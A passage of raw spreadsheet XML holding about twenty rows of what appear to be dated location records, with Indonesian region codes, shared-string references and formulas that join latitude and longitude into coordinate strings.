      <c r="E2619" t="s">
        <v>23</v>
      </c>
      <c r="F2619" t="s">
        <v>8844</v>
      </c>
      <c r="H2619" t="s">
        <v>26</v>
      </c>
      <c r="I2619" t="s">
        <v>3062</v>
      </c>
      <c r="J2619" t="s">
        <v>1656</v>
      </c>
      <c r="L2619" t="s">
        <v>8845</v>
      </c>
      <c r="M2619">
        <v>3173080003</v>
      </c>
      <c r="N2619">
        <v>3173080</v>
      </c>
      <c r="O2619">
        <v>3173</v>
      </c>
      <c r="P2619">
        <v>31</v>
      </c>
      <c r="Q2619" t="s">
        <v>157</v>
      </c>
      <c r="R2619" t="s">
        <v>157</v>
      </c>
      <c r="S2619" t="s">
        <v>62</v>
      </c>
      <c r="T2619" t="s">
        <v>33</v>
      </c>
      <c r="U2619" s="5">
        <v>10682715</v>
      </c>
      <c r="V2619" s="5" t="s">
        <v>16381</v>
      </c>
      <c r="W2619" s="5">
        <v>-617539</v>
      </c>
      <c r="X2619" t="s">
        <v>19329</v>
      </c>
      <c r="Y2619" t="str">
        <f t="shared" si="40"/>
        <v>-6.17539,106.82715</v>
      </c>
    </row>
    <row r="2620" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2620">
        <v>226281</v>
      </c>
      <c r="B2620" s="1">
        <v>44210</v>
      </c>
      <c r="C2620" s="2">
        <v>0.15118055555555557</v>
      </c>
      <c r="D2620" t="s">
        <v>22</v>
      </c>
      <c r="E2620" t="s">
        <v>23</v>
      </c>
      <c r="F2620" t="s">
        <v>8846</v>
      </c>
      <c r="G2620" t="s">
        <v>8847</v>
      </c>
      <c r="H2620" t="s">
        <v>26</v>
      </c>
      <c r="I2620" t="s">
        <v>886</v>
      </c>
      <c r="J2620" t="s">
        <v>6509</v>
      </c>
      <c r="L2620" t="s">
        <v>8848</v>
      </c>
      <c r="M2620">
        <v>6304060007</v>
      </c>
      <c r="N2620">
        <v>6304060</v>
      </c>
      <c r="O2620">
        <v>6304</v>
      </c>
      <c r="P2620">
        <v>63</v>
      </c>
      <c r="Q2620" t="s">
        <v>8849</v>
      </c>
      <c r="R2620" t="s">
        <v>8850</v>
      </c>
      <c r="S2620" t="s">
        <v>8851</v>
      </c>
      <c r="T2620" t="s">
        <v>6513</v>
      </c>
      <c r="U2620" s="5">
        <v>11461586</v>
      </c>
      <c r="V2620" s="5" t="s">
        <v>16799</v>
      </c>
      <c r="W2620" s="5">
        <v>-326128</v>
      </c>
      <c r="X2620" t="s">
        <v>20539</v>
      </c>
      <c r="Y2620" t="str">
        <f t="shared" si="40"/>
        <v>-3.26128,114.61586</v>
      </c>
    </row>
    <row r="2621" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2621">
        <v>226282</v>
      </c>
      <c r="B2621" s="1">
        <v>44210</v>
      </c>
      <c r="C2621" s="2">
        <v>0.17001157407407408</v>
      </c>
      <c r="D2621" t="s">
        <v>22</v>
      </c>
      <c r="E2621" t="s">
        <v>23</v>
      </c>
      <c r="F2621" t="s">
        <v>8852</v>
      </c>
      <c r="G2621" t="s">
        <v>8853</v>
      </c>
      <c r="H2621" t="s">
        <v>26</v>
      </c>
      <c r="I2621" t="s">
        <v>4261</v>
      </c>
      <c r="J2621" t="s">
        <v>6509</v>
      </c>
      <c r="L2621" t="s">
        <v>8854</v>
      </c>
      <c r="M2621">
        <v>6303060004</v>
      </c>
      <c r="N2621">
        <v>6303060</v>
      </c>
      <c r="O2621">
        <v>6303</v>
      </c>
      <c r="P2621">
        <v>63</v>
      </c>
      <c r="Q2621" t="s">
        <v>8855</v>
      </c>
      <c r="R2621" t="s">
        <v>8750</v>
      </c>
      <c r="S2621" t="s">
        <v>8751</v>
      </c>
      <c r="T2621" t="s">
        <v>6513</v>
      </c>
      <c r="U2621" s="5">
        <v>11493566</v>
      </c>
      <c r="V2621" s="5" t="s">
        <v>16800</v>
      </c>
      <c r="W2621" s="5">
        <v>-335413</v>
      </c>
      <c r="X2621" t="s">
        <v>20540</v>
      </c>
      <c r="Y2621" t="str">
        <f t="shared" si="40"/>
        <v>-3.35413,114.93566</v>
      </c>
    </row>
    <row r="2622" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2622">
        <v>226283</v>
      </c>
      <c r="B2622" s="1">
        <v>44210</v>
      </c>
      <c r="C2622" s="2">
        <v>0.22072916666666667</v>
      </c>
      <c r="D2622" t="s">
        <v>22</v>
      </c>
      <c r="E2622" t="s">
        <v>23</v>
      </c>
      <c r="F2622" t="s">
        <v>8856</v>
      </c>
      <c r="H2622" t="s">
        <v>26</v>
      </c>
      <c r="I2622" t="s">
        <v>193</v>
      </c>
      <c r="J2622" t="s">
        <v>6509</v>
      </c>
      <c r="L2622" t="s">
        <v>8857</v>
      </c>
      <c r="M2622">
        <v>6371010004</v>
      </c>
      <c r="N2622">
        <v>6371010</v>
      </c>
      <c r="O2622">
        <v>6371</v>
      </c>
      <c r="P2622">
        <v>63</v>
      </c>
      <c r="Q2622" t="s">
        <v>8858</v>
      </c>
      <c r="R2622" t="s">
        <v>6511</v>
      </c>
      <c r="S2622" t="s">
        <v>6512</v>
      </c>
      <c r="T2622" t="s">
        <v>6513</v>
      </c>
      <c r="U2622" s="5">
        <v>11458912</v>
      </c>
      <c r="V2622" s="5" t="s">
        <v>16801</v>
      </c>
      <c r="W2622" s="5">
        <v>-336450</v>
      </c>
      <c r="X2622" t="s">
        <v>20541</v>
      </c>
      <c r="Y2622" t="str">
        <f t="shared" si="40"/>
        <v>-3.36450,114.58912</v>
      </c>
    </row>
    <row r="2623" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2623">
        <v>226284</v>
      </c>
      <c r="B2623" s="1">
        <v>44210</v>
      </c>
      <c r="C2623" s="2">
        <v>0.22190972222222224</v>
      </c>
      <c r="D2623" t="s">
        <v>22</v>
      </c>
      <c r="E2623" t="s">
        <v>23</v>
      </c>
      <c r="F2623" t="s">
        <v>8859</v>
      </c>
      <c r="G2623" t="s">
        <v>8860</v>
      </c>
      <c r="H2623" t="s">
        <v>26</v>
      </c>
      <c r="I2623" t="s">
        <v>4153</v>
      </c>
      <c r="J2623" t="s">
        <v>2622</v>
      </c>
      <c r="L2623" t="s">
        <v>8861</v>
      </c>
      <c r="M2623">
        <v>3509060004</v>
      </c>
      <c r="N2623">
        <v>3509060</v>
      </c>
      <c r="O2623">
        <v>3509</v>
      </c>
      <c r="P2623">
        <v>35</v>
      </c>
      <c r="Q2623" t="s">
        <v>8862</v>
      </c>
      <c r="R2623" t="s">
        <v>8863</v>
      </c>
      <c r="S2623" t="s">
        <v>6492</v>
      </c>
      <c r="T2623" t="s">
        <v>1221</v>
      </c>
      <c r="U2623" s="5">
        <v>11367917</v>
      </c>
      <c r="V2623" s="5" t="s">
        <v>16802</v>
      </c>
      <c r="W2623" s="5">
        <v>-838937</v>
      </c>
      <c r="X2623" t="s">
        <v>20542</v>
      </c>
      <c r="Y2623" t="str">
        <f t="shared" si="40"/>
        <v>-8.38937,113.67917</v>
      </c>
    </row>
    <row r="2624" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2624">
        <v>226285</v>
      </c>
      <c r="B2624" s="1">
        <v>44210</v>
      </c>
      <c r="C2624" s="2">
        <v>0.22790509259259259</v>
      </c>
      <c r="D2624" t="s">
        <v>22</v>
      </c>
      <c r="E2624" t="s">
        <v>23</v>
      </c>
      <c r="F2624" t="s">
        <v>8864</v>
      </c>
      <c r="H2624" t="s">
        <v>26</v>
      </c>
      <c r="I2624" t="s">
        <v>1136</v>
      </c>
      <c r="J2624" t="s">
        <v>6509</v>
      </c>
      <c r="L2624" t="s">
        <v>8865</v>
      </c>
      <c r="M2624">
        <v>6303110010</v>
      </c>
      <c r="N2624">
        <v>6303110</v>
      </c>
      <c r="O2624">
        <v>6303</v>
      </c>
      <c r="P2624">
        <v>63</v>
      </c>
      <c r="Q2624" t="s">
        <v>8866</v>
      </c>
      <c r="R2624" t="s">
        <v>8867</v>
      </c>
      <c r="S2624" t="s">
        <v>8751</v>
      </c>
      <c r="T2624" t="s">
        <v>6513</v>
      </c>
      <c r="U2624" s="5">
        <v>11497467</v>
      </c>
      <c r="V2624" s="5" t="s">
        <v>16803</v>
      </c>
      <c r="W2624" s="5">
        <v>-327163</v>
      </c>
      <c r="X2624" t="s">
        <v>20543</v>
      </c>
      <c r="Y2624" t="str">
        <f t="shared" si="40"/>
        <v>-3.27163,114.97467</v>
      </c>
    </row>
    <row r="2625" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2625">
        <v>226286</v>
      </c>
      <c r="B2625" s="1">
        <v>44210</v>
      </c>
      <c r="C2625" s="2">
        <v>0.24783564814814815</v>
      </c>
      <c r="D2625" t="s">
        <v>22</v>
      </c>
      <c r="E2625" t="s">
        <v>23</v>
      </c>
      <c r="F2625" t="s">
        <v>8868</v>
      </c>
      <c r="G2625" t="s">
        <v>8869</v>
      </c>
      <c r="H2625" t="s">
        <v>26</v>
      </c>
      <c r="I2625" t="s">
        <v>137</v>
      </c>
      <c r="J2625" t="s">
        <v>6509</v>
      </c>
      <c r="L2625" t="s">
        <v>8870</v>
      </c>
      <c r="M2625">
        <v>6301060023</v>
      </c>
      <c r="N2625">
        <v>6301060</v>
      </c>
      <c r="O2625">
        <v>6301</v>
      </c>
      <c r="P2625">
        <v>63</v>
      </c>
      <c r="Q2625" t="s">
        <v>8871</v>
      </c>
      <c r="R2625" t="s">
        <v>7536</v>
      </c>
      <c r="S2625" t="s">
        <v>7537</v>
      </c>
      <c r="T2625" t="s">
        <v>6513</v>
      </c>
      <c r="U2625" s="5">
        <v>11477587</v>
      </c>
      <c r="V2625" s="5" t="s">
        <v>16804</v>
      </c>
      <c r="W2625" s="5">
        <v>-378175</v>
      </c>
      <c r="X2625" t="s">
        <v>20544</v>
      </c>
      <c r="Y2625" t="str">
        <f t="shared" si="40"/>
        <v>-3.78175,114.77587</v>
      </c>
    </row>
    <row r="2626" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2626">
        <v>226287</v>
      </c>
      <c r="B2626" s="1">
        <v>44210</v>
      </c>
      <c r="C2626" s="2">
        <v>0.29991898148148149</v>
      </c>
      <c r="D2626" t="s">
        <v>22</v>
      </c>
      <c r="E2626" t="s">
        <v>23</v>
      </c>
      <c r="F2626" t="s">
        <v>8872</v>
      </c>
      <c r="G2626" t="s">
        <v>8873</v>
      </c>
      <c r="H2626" t="s">
        <v>26</v>
      </c>
      <c r="I2626" t="s">
        <v>1809</v>
      </c>
      <c r="J2626" t="s">
        <v>6509</v>
      </c>
      <c r="M2626">
        <v>6303020011</v>
      </c>
      <c r="N2626">
        <v>6303020</v>
      </c>
      <c r="O2626">
        <v>6303</v>
      </c>
      <c r="P2626">
        <v>63</v>
      </c>
      <c r="Q2626" t="s">
        <v>8874</v>
      </c>
      <c r="R2626" t="s">
        <v>8875</v>
      </c>
      <c r="S2626" t="s">
        <v>8751</v>
      </c>
      <c r="T2626" t="s">
        <v>6513</v>
      </c>
      <c r="U2626" s="5">
        <v>11466854</v>
      </c>
      <c r="V2626" s="5" t="s">
        <v>16805</v>
      </c>
      <c r="W2626" s="5">
        <v>-340380</v>
      </c>
      <c r="X2626" t="s">
        <v>20545</v>
      </c>
      <c r="Y2626" t="str">
        <f t="shared" si="40"/>
        <v>-3.40380,114.66854</v>
      </c>
    </row>
    <row r="2627" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2627">
        <v>226288</v>
      </c>
      <c r="B2627" s="1">
        <v>44210</v>
      </c>
      <c r="C2627" s="2">
        <v>0.34134259259259259</v>
      </c>
      <c r="D2627" t="s">
        <v>22</v>
      </c>
      <c r="E2627" t="s">
        <v>23</v>
      </c>
      <c r="F2627" t="s">
        <v>8876</v>
      </c>
      <c r="G2627" t="s">
        <v>8877</v>
      </c>
      <c r="H2627" t="s">
        <v>26</v>
      </c>
      <c r="I2627" t="s">
        <v>8878</v>
      </c>
      <c r="J2627" t="s">
        <v>6509</v>
      </c>
      <c r="L2627" t="s">
        <v>8879</v>
      </c>
      <c r="M2627">
        <v>6303050001</v>
      </c>
      <c r="N2627">
        <v>6303050</v>
      </c>
      <c r="O2627">
        <v>6303</v>
      </c>
      <c r="P2627">
        <v>63</v>
      </c>
      <c r="Q2627" t="s">
        <v>8767</v>
      </c>
      <c r="R2627" t="s">
        <v>8759</v>
      </c>
      <c r="S2627" t="s">
        <v>8751</v>
      </c>
      <c r="T2627" t="s">
        <v>6513</v>
      </c>
      <c r="U2627" s="5">
        <v>11484067</v>
      </c>
      <c r="V2627" s="5" t="s">
        <v>16806</v>
      </c>
      <c r="W2627" s="5">
        <v>-339207</v>
      </c>
      <c r="X2627" t="s">
        <v>20546</v>
      </c>
      <c r="Y2627" t="str">
        <f t="shared" ref="Y2627:Y2690" si="41">CONCATENATE(X2627,",",V2627)</f>
        <v>-3.39207,114.84067</v>
      </c>
    </row>
    <row r="2628" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2628">
        <v>226289</v>
      </c>
      <c r="B2628" s="1">
        <v>44210</v>
      </c>
      <c r="C2628" s="2">
        <v>0.38965277777777779</v>
      </c>
      <c r="D2628" t="s">
        <v>22</v>
      </c>
      <c r="E2628" t="s">
        <v>23</v>
      </c>
      <c r="F2628" t="s">
        <v>8880</v>
      </c>
      <c r="G2628" t="s">
        <v>8881</v>
      </c>
      <c r="H2628" t="s">
        <v>26</v>
      </c>
      <c r="I2628" t="s">
        <v>117</v>
      </c>
      <c r="J2628" t="s">
        <v>6509</v>
      </c>
      <c r="L2628" t="s">
        <v>8882</v>
      </c>
      <c r="M2628">
        <v>6306010024</v>
      </c>
      <c r="N2628">
        <v>6306010</v>
      </c>
      <c r="O2628">
        <v>6306</v>
      </c>
      <c r="P2628">
        <v>63</v>
      </c>
      <c r="Q2628" t="s">
        <v>8883</v>
      </c>
      <c r="R2628" t="s">
        <v>8884</v>
      </c>
      <c r="S2628" t="s">
        <v>8885</v>
      </c>
      <c r="T2628" t="s">
        <v>6513</v>
      </c>
      <c r="U2628" s="5">
        <v>11529476</v>
      </c>
      <c r="V2628" s="5" t="s">
        <v>16807</v>
      </c>
      <c r="W2628" s="5">
        <v>-281314</v>
      </c>
      <c r="X2628" t="s">
        <v>20547</v>
      </c>
      <c r="Y2628" t="str">
        <f t="shared" si="41"/>
        <v>-2.81314,115.29476</v>
      </c>
    </row>
    <row r="2629" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2629">
        <v>226290</v>
      </c>
      <c r="B2629" s="1">
        <v>44210</v>
      </c>
      <c r="C2629" s="2">
        <v>0.43702546296296302</v>
      </c>
      <c r="D2629" t="s">
        <v>22</v>
      </c>
      <c r="E2629" t="s">
        <v>23</v>
      </c>
      <c r="F2629" t="s">
        <v>8886</v>
      </c>
      <c r="G2629" t="s">
        <v>8887</v>
      </c>
      <c r="H2629" t="s">
        <v>26</v>
      </c>
      <c r="I2629" t="s">
        <v>1758</v>
      </c>
      <c r="J2629" t="s">
        <v>7171</v>
      </c>
      <c r="L2629" t="s">
        <v>8888</v>
      </c>
      <c r="M2629">
        <v>6472061003</v>
      </c>
      <c r="N2629">
        <v>6472061</v>
      </c>
      <c r="O2629">
        <v>6472</v>
      </c>
      <c r="P2629">
        <v>64</v>
      </c>
      <c r="Q2629" t="s">
        <v>8889</v>
      </c>
      <c r="R2629" t="s">
        <v>7185</v>
      </c>
      <c r="S2629" t="s">
        <v>7175</v>
      </c>
      <c r="T2629" t="s">
        <v>1308</v>
      </c>
      <c r="U2629" s="5">
        <v>11716964</v>
      </c>
      <c r="V2629" s="5" t="s">
        <v>16808</v>
      </c>
      <c r="W2629" s="5">
        <v>-47481</v>
      </c>
      <c r="X2629" t="s">
        <v>20548</v>
      </c>
      <c r="Y2629" t="str">
        <f t="shared" si="41"/>
        <v xml:space="preserve"> -0.47481,117.16964</v>
      </c>
    </row>
    <row r="2630" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2630">
        <v>226291</v>
      </c>
      <c r="B2630" s="1">
        <v>44210</v>
      </c>
      <c r="C2630" s="2">
        <v>0.52784722222222225</v>
      </c>
      <c r="D2630" t="s">
        <v>22</v>
      </c>
      <c r="E2630" t="s">
        <v>23</v>
      </c>
      <c r="F2630" t="s">
        <v>8890</v>
      </c>
      <c r="G2630" t="s">
        <v>8891</v>
      </c>
      <c r="H2630" t="s">
        <v>26</v>
      </c>
      <c r="I2630" t="s">
        <v>517</v>
      </c>
      <c r="J2630" t="s">
        <v>6509</v>
      </c>
      <c r="L2630" t="s">
        <v>8892</v>
      </c>
      <c r="M2630">
        <v>6371020011</v>
      </c>
      <c r="N2630">
        <v>6371020</v>
      </c>
      <c r="O2630">
        <v>6371</v>
      </c>
      <c r="P2630">
        <v>63</v>
      </c>
      <c r="Q2630" t="s">
        <v>8893</v>
      </c>
      <c r="R2630" t="s">
        <v>8795</v>
      </c>
      <c r="S2630" t="s">
        <v>6512</v>
      </c>
      <c r="T2630" t="s">
        <v>6513</v>
      </c>
      <c r="U2630" s="5">
        <v>11461020</v>
      </c>
      <c r="V2630" s="5" t="s">
        <v>16809</v>
      </c>
      <c r="W2630" s="5">
        <v>-331530</v>
      </c>
      <c r="X2630" t="s">
        <v>20549</v>
      </c>
      <c r="Y2630" t="str">
        <f t="shared" si="41"/>
        <v>-3.31530,114.61020</v>
      </c>
    </row>
    <row r="2631" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2631">
        <v>226292</v>
      </c>
      <c r="B2631" s="1">
        <v>44210</v>
      </c>
      <c r="C2631" s="2">
        <v>0.54284722222222226</v>
      </c>
      <c r="D2631" t="s">
        <v>22</v>
      </c>
      <c r="E2631" t="s">
        <v>23</v>
      </c>
      <c r="F2631" t="s">
        <v>8894</v>
      </c>
      <c r="H2631" t="s">
        <v>26</v>
      </c>
      <c r="I2631" t="s">
        <v>1263</v>
      </c>
      <c r="J2631" t="s">
        <v>6509</v>
      </c>
      <c r="L2631" t="s">
        <v>8895</v>
      </c>
      <c r="M2631">
        <v>6309060017</v>
      </c>
      <c r="N2631">
        <v>6309060</v>
      </c>
      <c r="O2631">
        <v>6309</v>
      </c>
      <c r="P2631">
        <v>63</v>
      </c>
      <c r="Q2631" t="s">
        <v>8896</v>
      </c>
      <c r="R2631" t="s">
        <v>6715</v>
      </c>
      <c r="S2631" t="s">
        <v>8897</v>
      </c>
      <c r="T2631" t="s">
        <v>6513</v>
      </c>
      <c r="U2631" s="5">
        <v>11542067</v>
      </c>
      <c r="V2631" s="5" t="s">
        <v>16810</v>
      </c>
      <c r="W2631" s="5">
        <v>-208574</v>
      </c>
      <c r="X2631" t="s">
        <v>20550</v>
      </c>
      <c r="Y2631" t="str">
        <f t="shared" si="41"/>
        <v>-2.08574,115.42067</v>
      </c>
    </row>
    <row r="2632" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2632">
        <v>226293</v>
      </c>
      <c r="B2632" s="1">
        <v>44210</v>
      </c>
      <c r="C2632" s="2">
        <v>0.58760416666666659</v>
      </c>
      <c r="D2632" t="s">
        <v>22</v>
      </c>
      <c r="E2632" t="s">
        <v>23</v>
      </c>
      <c r="F2632" t="s">
        <v>8898</v>
      </c>
      <c r="G2632" t="s">
        <v>8899</v>
      </c>
      <c r="H2632" t="s">
        <v>26</v>
      </c>
      <c r="I2632" t="s">
        <v>1194</v>
      </c>
      <c r="J2632" t="s">
        <v>6509</v>
      </c>
      <c r="L2632" t="s">
        <v>8900</v>
      </c>
      <c r="M2632">
        <v>6371040012</v>
      </c>
      <c r="N2632">
        <v>6371040</v>
      </c>
      <c r="O2632">
        <v>6371</v>
      </c>
      <c r="P2632">
        <v>63</v>
      </c>
      <c r="Q2632" t="s">
        <v>8901</v>
      </c>
      <c r="R2632" t="s">
        <v>8782</v>
      </c>
      <c r="S2632" t="s">
        <v>6512</v>
      </c>
      <c r="T2632" t="s">
        <v>6513</v>
      </c>
      <c r="U2632" s="5">
        <v>11461485</v>
      </c>
      <c r="V2632" s="5" t="s">
        <v>16811</v>
      </c>
      <c r="W2632" s="5">
        <v>-329541</v>
      </c>
      <c r="X2632" t="s">
        <v>20551</v>
      </c>
      <c r="Y2632" t="str">
        <f t="shared" si="41"/>
        <v>-3.29541,114.61485</v>
      </c>
    </row>
    <row r="2633" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2633">
        <v>226294</v>
      </c>
      <c r="B2633" s="1">
        <v>44210</v>
      </c>
      <c r="C2633" s="2">
        <v>0.63480324074074079</v>
      </c>
      <c r="D2633" t="s">
        <v>22</v>
      </c>
      <c r="E2633" t="s">
        <v>23</v>
      </c>
      <c r="F2633" t="s">
        <v>8902</v>
      </c>
      <c r="G2633" t="s">
        <v>8903</v>
      </c>
      <c r="H2633" t="s">
        <v>26</v>
      </c>
      <c r="I2633" t="s">
        <v>1447</v>
      </c>
      <c r="J2633" t="s">
        <v>6509</v>
      </c>
      <c r="M2633">
        <v>6306050012</v>
      </c>
      <c r="N2633">
        <v>6306050</v>
      </c>
      <c r="O2633">
        <v>6306</v>
      </c>
      <c r="P2633">
        <v>63</v>
      </c>
      <c r="Q2633" t="s">
        <v>8904</v>
      </c>
      <c r="R2633" t="s">
        <v>6388</v>
      </c>
      <c r="S2633" t="s">
        <v>8885</v>
      </c>
      <c r="T2633" t="s">
        <v>6513</v>
      </c>
      <c r="U2633" s="5">
        <v>11526562</v>
      </c>
      <c r="V2633" s="5" t="s">
        <v>16812</v>
      </c>
      <c r="W2633" s="5">
        <v>-278677</v>
      </c>
      <c r="X2633" t="s">
        <v>20552</v>
      </c>
      <c r="Y2633" t="str">
        <f t="shared" si="41"/>
        <v>-2.78677,115.26562</v>
      </c>
    </row>
    <row r="2634" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2634">
        <v>226295</v>
      </c>
      <c r="B2634" s="1">
        <v>44210</v>
      </c>
      <c r="C2634" s="2">
        <v>0.65818287037037038</v>
      </c>
      <c r="D2634" t="s">
        <v>22</v>
      </c>
      <c r="E2634" t="s">
        <v>23</v>
      </c>
      <c r="F2634" t="s">
        <v>8905</v>
      </c>
      <c r="G2634" t="s">
        <v>8906</v>
      </c>
      <c r="H2634" t="s">
        <v>26</v>
      </c>
      <c r="I2634" t="s">
        <v>592</v>
      </c>
      <c r="J2634" t="s">
        <v>6509</v>
      </c>
      <c r="L2634" t="s">
        <v>8907</v>
      </c>
      <c r="M2634">
        <v>6371010008</v>
      </c>
      <c r="N2634">
        <v>6371010</v>
      </c>
      <c r="O2634">
        <v>6371</v>
      </c>
      <c r="P2634">
        <v>63</v>
      </c>
      <c r="Q2634" t="s">
        <v>8908</v>
      </c>
      <c r="R2634" t="s">
        <v>6511</v>
      </c>
      <c r="S2634" t="s">
        <v>6512</v>
      </c>
      <c r="T2634" t="s">
        <v>6513</v>
      </c>
      <c r="U2634" s="5">
        <v>11461049</v>
      </c>
      <c r="V2634" s="5" t="s">
        <v>16813</v>
      </c>
      <c r="W2634" s="5">
        <v>-334076</v>
      </c>
      <c r="X2634" t="s">
        <v>20553</v>
      </c>
      <c r="Y2634" t="str">
        <f t="shared" si="41"/>
        <v>-3.34076,114.61049</v>
      </c>
    </row>
    <row r="2635" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2635">
        <v>226296</v>
      </c>
      <c r="B2635" s="1">
        <v>44210</v>
      </c>
      <c r="C2635" s="2">
        <v>0.72608796296296296</v>
      </c>
      <c r="D2635" t="s">
        <v>22</v>
      </c>
      <c r="E2635" t="s">
        <v>23</v>
      </c>
      <c r="F2635" t="s">
        <v>8909</v>
      </c>
      <c r="G2635" t="s">
        <v>8910</v>
      </c>
      <c r="H2635" t="s">
        <v>26</v>
      </c>
      <c r="I2635" t="s">
        <v>8911</v>
      </c>
      <c r="J2635" t="s">
        <v>6509</v>
      </c>
      <c r="L2635" t="s">
        <v>8912</v>
      </c>
      <c r="M2635">
        <v>6303050002</v>
      </c>
      <c r="N2635">
        <v>6303050</v>
      </c>
      <c r="O2635">
        <v>6303</v>
      </c>
      <c r="P2635">
        <v>63</v>
      </c>
      <c r="Q2635" t="s">
        <v>8758</v>
      </c>
      <c r="R2635" t="s">
        <v>8759</v>
      </c>
      <c r="S2635" t="s">
        <v>8751</v>
      </c>
      <c r="T2635" t="s">
        <v>6513</v>
      </c>
      <c r="U2635" s="5">
        <v>11485401</v>
      </c>
      <c r="V2635" s="5" t="s">
        <v>16814</v>
      </c>
      <c r="W2635" s="5">
        <v>-341011</v>
      </c>
      <c r="X2635" t="s">
        <v>20554</v>
      </c>
      <c r="Y2635" t="str">
        <f t="shared" si="41"/>
        <v>-3.41011,114.85401</v>
      </c>
    </row>
    <row r="2636" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2636">
        <v>226297</v>
      </c>
      <c r="B2636" s="1">
        <v>44210</v>
      </c>
      <c r="C2636" s="2">
        <v>0.69303240740740746</v>
      </c>
      <c r="D2636" t="s">
        <v>22</v>
      </c>
      <c r="E2636" t="s">
        <v>23</v>
      </c>
      <c r="F2636" t="s">
        <v>8913</v>
      </c>
      <c r="G2636" t="s">
        <v>8914</v>
      </c>
      <c r="H2636" t="s">
        <v>26</v>
      </c>
      <c r="I2636" t="s">
        <v>27</v>
      </c>
      <c r="J2636" t="s">
        <v>6509</v>
      </c>
      <c r="L2636" t="s">
        <v>8915</v>
      </c>
      <c r="M2636">
        <v>6371020002</v>
      </c>
      <c r="N2636">
        <v>6371020</v>
      </c>
      <c r="O2636">
        <v>6371</v>
      </c>
      <c r="P2636">
        <v>63</v>
      </c>
      <c r="Q2636" t="s">
        <v>8794</v>
      </c>
      <c r="R2636" t="s">
        <v>8795</v>
      </c>
      <c r="S2636" t="s">
        <v>6512</v>
      </c>
      <c r="T2636" t="s">
        <v>6513</v>
      </c>
      <c r="U2636" s="5">
        <v>11460645</v>
      </c>
      <c r="V2636" s="5" t="s">
        <v>16815</v>
      </c>
      <c r="W2636" s="5">
        <v>-333234</v>
      </c>
      <c r="X2636" t="s">
        <v>20555</v>
      </c>
      <c r="Y2636" t="str">
        <f t="shared" si="41"/>
        <v>-3.33234,114.60645</v>
      </c>
    </row>
    <row r="2637" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2637">
        <v>226298</v>
      </c>
      <c r="B2637" s="1">
        <v>44210</v>
      </c>
      <c r="C2637" s="2">
        <v>0.70609953703703709</v>
      </c>
      <c r="D2637" t="s">
        <v>22</v>
      </c>
      <c r="E2637" t="s">
        <v>23</v>
      </c>
      <c r="F2637" t="s">
        <v>8916</v>
      </c>
      <c r="G2637" t="s">
        <v>8917</v>
      </c>
      <c r="H2637" t="s">
        <v>26</v>
      </c>
      <c r="I2637" t="s">
        <v>137</v>
      </c>
      <c r="J2637" t="s">
        <v>6509</v>
      </c>
      <c r="L2637" t="s">
        <v>8918</v>
      </c>
      <c r="M2637">
        <v>6371040008</v>
      </c>
      <c r="N2637">
        <v>6371040</v>
      </c>
      <c r="O2637">
        <v>6371</v>
      </c>
      <c r="P2637">
        <v>63</v>
      </c>
      <c r="Q2637" t="s">
        <v>8919</v>
      </c>
      <c r="R2637" t="s">
        <v>8782</v>
      </c>
      <c r="S2637" t="s">
        <v>6512</v>
      </c>
      <c r="T2637" t="s">
        <v>6513</v>
      </c>
      <c r="U2637" s="5">
        <v>11460437</v>
      </c>
      <c r="V2637" s="5" t="s">
        <v>16816</v>
      </c>
      <c r="W2637" s="5">
        <v>-330774</v>
      </c>
      <c r="X2637" t="s">
        <v>20556</v>
      </c>
      <c r="Y2637" t="str">
        <f t="shared" si="41"/>
        <v>-3.30774,114.60437</v>
      </c>
    </row>
    <row r="2638" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2638">
        <v>226299</v>
      </c>
      <c r="B2638" s="1">
        <v>44210</v>
      </c>
      <c r="C2638" s="2">
        <v>0.73556712962962967</v>
      </c>
      <c r="D2638" t="s">
        <v>22</v>
      </c>
      <c r="E2638" t="s">
        <v>23</v>
      </c>
      <c r="F2638" s="3" t="s">
        <v>8920</v>
      </c>
      <c r="G2638" t="s">
        <v>8921</v>
      </c>
      <c r="H2638" t="s">
        <v>26</v>
      </c>
      <c r="I2638" t="s">
        <v>2196</v>
      </c>
      <c r="J2638" t="s">
        <v>6509</v>
      </c>
      <c r="L2638" t="s">
        <v>8922</v>
      </c>
      <c r="M2638">
        <v>6304060007</v>
      </c>
      <c r="N2638">
        <v>6304060</v>
      </c>
      <c r="O2638">
        <v>6304</v>
      </c>
      <c r="P2638">
        <v>63</v>
      </c>
      <c r="Q2638" t="s">
        <v>8849</v>
      </c>
      <c r="R2638" t="s">
        <v>8850</v>
      </c>
      <c r="S2638" t="s">
        <v>8851</v>
      </c>
      <c r="T2638" t="s">
        <v>6513</v>
      </c>
      <c r="U2638" s="5">
        <v>11461257</v>
      </c>
      <c r="V2638" s="5" t="s">
        <v>16817</v>
      </c>
      <c r="W2638" s="5">
        <v>-326683</v>
      </c>
      <c r="X2638" t="s">
        <v>20557</v>
      </c>
      <c r="Y2638" t="str">
        <f t="shared" si="41"/>
        <v>-3.26683,114.61257</v>
      </c>
    </row>
    <row r="2639" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2639">
        <v>226300</v>
      </c>
      <c r="B2639" s="1">
        <v>44210</v>
      </c>
      <c r="C2639" s="2">
        <v>0.76133101851851848</v>
      </c>
      <c r="D2639" t="s">
        <v>22</v>
      </c>
      <c r="E2639" t="s">
        <v>23</v>
      </c>
      <c r="F2639" t="s">
        <v>8923</v>
      </c>
      <c r="H2639" t="s">
        <v>26</v>
      </c>
      <c r="I2639" t="s">
        <v>3062</v>
      </c>
      <c r="J2639" t="s">
        <v>6509</v>
      </c>
      <c r="L2639" t="s">
        <v>8924</v>
      </c>
